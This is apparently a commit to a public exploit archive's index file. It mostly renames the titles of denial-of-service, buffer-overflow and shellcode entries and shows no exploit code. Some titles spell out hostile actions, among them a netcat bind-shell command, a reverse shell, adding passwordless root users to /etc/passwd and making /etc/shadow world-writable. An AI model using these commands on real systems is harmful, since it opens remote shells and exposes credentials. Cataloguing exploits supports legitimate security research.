DB: 2017-07-12

9 new exploits Apache 2.0.52 - HTTP GET request Denial of Service Apache 2.0.52 - GET Request Denial of Service Microsoft IIS - Malformed HTTP Request Denial of Service (1) Microsoft IIS - Malformed HTTP Request Denial of Service (2) Microsoft IIS - HTTP Request Denial of Service (1) Microsoft IIS - HTTP Request Denial of Service (2) Microsoft IIS - Malformed HTTP Request Denial of Service Microsoft IIS - HTTP Request Denial of Service Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC) Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC) Allegro RomPager 2.10 - Malformed URL Request Denial of Service Allegro RomPager 2.10 - URL Request Denial of Service AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service Netwin SurgeFTP 1.0b - Malformed Request Denial of Service Netwin SurgeFTP 1.0b - Denial of Service iCal 3.7 - Malformed HTTP Request Denial of Service iCal 3.7 - HTTP Request Denial of Service 3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service 3ware Disk Managment 1.10 - HTTP Request Denial of Service Pi3Web 2.0.1 - Malformed GET Request Denial of Service Pi3Web 2.0.1 - GET Request Denial of Service Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service Linksys PSUS4 PrintServer - POST Request Denial of Service Multiple IEA Software Products - HTTP POST Request Denial of Service Multiple IEA Software Products - POST Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow Pelco VideoXpert 1.12.105 - Privilege Escalation Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH) Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass) NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass) Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) (Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes) (Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes) Linux/x86-64 - flush iptables rules Shellcode (84 bytes) Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes) Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes) Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes) Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes) Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes) Linux/x86 - File unlinker Shellcode (18+ bytes) Linux/x86 - Perl script execution Shellcode (99+ bytes) Linux/x86 - file reader Shellcode (65+ bytes) Linux/x86 - File Unlinker Shellcode (18+ bytes) Linux/x86 - Perl Script Execution Shellcode (99+ bytes) Linux/x86 - File Reader Shellcode (65+ bytes) Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes) Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes) Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes) Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes) Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 bytes) Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Radically Self Modifying Code Shellcode (70 bytes) Linux/x86 - Magic Byte Self Modifying Code Shellcode (76 bytes) Linux/x86 - Radically Self-Modifying Shellcode (70 bytes) Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes) Linux/x86 - Add User 't00r' encrypt Shellcode (116 bytes) Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes) Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - Add User 't00r' Shellcode (82 bytes) Linux/x86 - Add User (t00r) Shellcode (82 bytes) Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes) Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes) Linux/x86 - Add User 'z' Shellcode (70 bytes) Linux/x86 - Add User (z) Shellcode (70 bytes) Linux/x86 - hard / unclean reboot Shellcode (29 bytes) Linux/x86 - hard / unclean reboot Shellcode (33 bytes) Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes) Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes) Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes) Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes) Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes) Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes) Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes) Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes) Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes) Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes) Linux/x86 - Remote Port Forwarding Shellcode (87 bytes) Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes) Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes) Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - /bin/sh ROT7 Encoded Shellcode Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes) Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes) Linux/x86-64 - Bind NetCat Shellcode (64 bytes) Linux/x86-64 - Bind Netcat Shellcode (64 bytes) Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes) Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes) Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes) Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes) Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes) Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes) Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes) Linux/x86-64 - Reverse NetCat Shellcode (72 bytes) Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes) Linux/x86-64 - Reverse Netcat Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes) Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access) Pelco Sarix/Spectra Cameras - Remote Code Execution Pelco VideoXpert 1.12.105 - Directory Traversal Pelco VideoXpert 1.12.105 - Information Disclosure NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection
2017-07-12 05:01:24 +00:00 · 2017-07-12 05:01:24 +00:00 · ed107bc711
commit ed107bc711
parent 4407c920f7
10 changed files with 1422 additions and 70 deletions
--- a/files.csv
+++ b/files.csv
@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port
 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0
 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0
 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0
-855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
+855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0
 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0
@ -264,12 +264,12 @@ id,file,description,date,author,platform,type,port
 1368,platforms/windows/dos/1368.cpp,"Counter Strike 2D 0.1.0.1 - Denial of Service",2005-12-11,"Iman Karim",windows,dos,0
 1371,platforms/windows/dos/1371.c,"Macromedia Flash Media Server 2 - Remote Denial of Service",2005-12-14,Kozan,windows,dos,0
 1372,platforms/windows/dos/1372.html,"Microsoft Internet Explorer 6 - (pre tag Multiple single tags) Denial of Service",2005-12-14,"Markus Heer",windows,dos,0
-1376,platforms/windows/dos/1376.c,"Microsoft IIS - Malformed HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0
+1376,platforms/windows/dos/1376.c,"Microsoft IIS - HTTP Request Denial of Service (1)",2005-12-19,Kozan,windows,dos,0
-1377,platforms/windows/dos/1377.pl,"Microsoft IIS - Malformed HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0
+1377,platforms/windows/dos/1377.pl,"Microsoft IIS - HTTP Request Denial of Service (2)",2005-12-19,kokanin,windows,dos,0
 1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6 - 'mshtml.dll datasrc' Denial of Service",2005-12-27,BuHa,windows,dos,0
 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0
 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0
-1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
+1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0
 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0
 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0
 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0
@ -734,7 +734,7 @@ id,file,description,date,author,platform,type,port
 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
-5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
+5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,windows,dos,0
 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
@ -1274,7 +1274,7 @@ id,file,description,date,author,platform,type,port
 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21
 10223,platforms/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21
 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0
-10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80
+10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80
 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0
 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0
 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21
@ -2364,7 +2364,7 @@ id,file,description,date,author,platform,type,port
 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0
 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0
-19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Malformed Request Remote Denial of Service",2000-04-12,eAX,windows,dos,0
+19843,platforms/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,windows,dos,0
 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0
 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0
 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0
@ -2499,7 +2499,7 @@ id,file,description,date,author,platform,type,port
 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,hardware,dos,0
 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,windows,dos,0
 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0
-20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Malformed Request Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0
+20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",multiple,dos,0
 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe - HTTPD 1.1 Get Denial of Service",2001-02-28,joetesta,windows,dos,0
 20664,platforms/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",windows,dos,0
 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,windows,dos,0
@ -2749,7 +2749,7 @@ id,file,description,date,author,platform,type,port
 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0
-22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0
+22117,platforms/windows/dos/22117.txt,"iCal 3.7 - HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0
 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0
 22119,platforms/windows/dos/22119.html,"Microsoft Pocket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge RÃ¸tnes",windows,dos,0
 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0
@ -2765,7 +2765,7 @@ id,file,description,date,author,platform,type,port
 22191,platforms/linux/dos/22191.pl,"Apache Web Server 2.0.x - MS-DOS Device Name Denial of Service",2003-01-22,"Matthew Murphy",linux,dos,0
 22196,platforms/windows/dos/22196.txt,"Rediff Bol 2.0.2 - URL Handling Denial of Service",2003-01-23,"S G Masood",windows,dos,0
 22197,platforms/linux/dos/22197.txt,"slocate 2.5/2.6 - Local Buffer Overrun",2003-01-24,"USG team",linux,dos,0
-22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - Malformed HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0
+22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 - HTTP Request Denial of Service",2003-01-30,"Nathan Neulinger",multiple,dos,0
 22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
 22220,platforms/windows/dos/22220.pl,"ByteCatcher FTP Client 1.0.4 - Long Server Banner Buffer Overflow",2003-02-04,"Dennis Rand",windows,dos,0
@ -2850,7 +2850,7 @@ id,file,description,date,author,platform,type,port
 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0
 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0
 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0
-22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0
+22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0
 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0
 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0
 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0
@ -3068,7 +3068,7 @@ id,file,description,date,author,platform,type,port
 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0
 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0
 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0
-23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
+23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0
 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0
 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0
 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0
@ -3318,7 +3318,7 @@ id,file,description,date,author,platform,type,port
 25076,platforms/linux/dos/25076.c,"PostgreSQL 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0
 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0
 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0
-25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0
+25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0
 25083,platforms/windows/dos/25083.txt,"RaidenHTTPD 1.1.27 - Remote File Disclosure",2005-02-05,"Donato Ferrante",windows,dos,0
 25085,platforms/windows/dos/25085.txt,"Microsoft Office XP 2000/2002 - HTML Link Processing Remote Buffer Overflow",2005-02-08,"Rafel Ivgi",windows,dos,0
 25107,platforms/hardware/dos/25107.txt,"Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access",2005-02-16,"Wang Ning",hardware,dos,0
@ -3922,7 +3922,7 @@ id,file,description,date,author,platform,type,port
 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - 'DELE' Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0
 31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader 8.1.1 - Multiple Arbitrary Code Execution / Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0
 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0
-31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
+31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0
 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0
 31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
@ -4015,7 +4015,7 @@ id,file,description,date,author,platform,type,port
 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0
 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0
 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0
-31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0
+31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0
 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0
 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0
 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
@ -4285,7 +4285,7 @@ id,file,description,date,author,platform,type,port
 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
-33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
+33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0
 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0
@ -4336,7 +4336,7 @@ id,file,description,date,author,platform,type,port
 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0
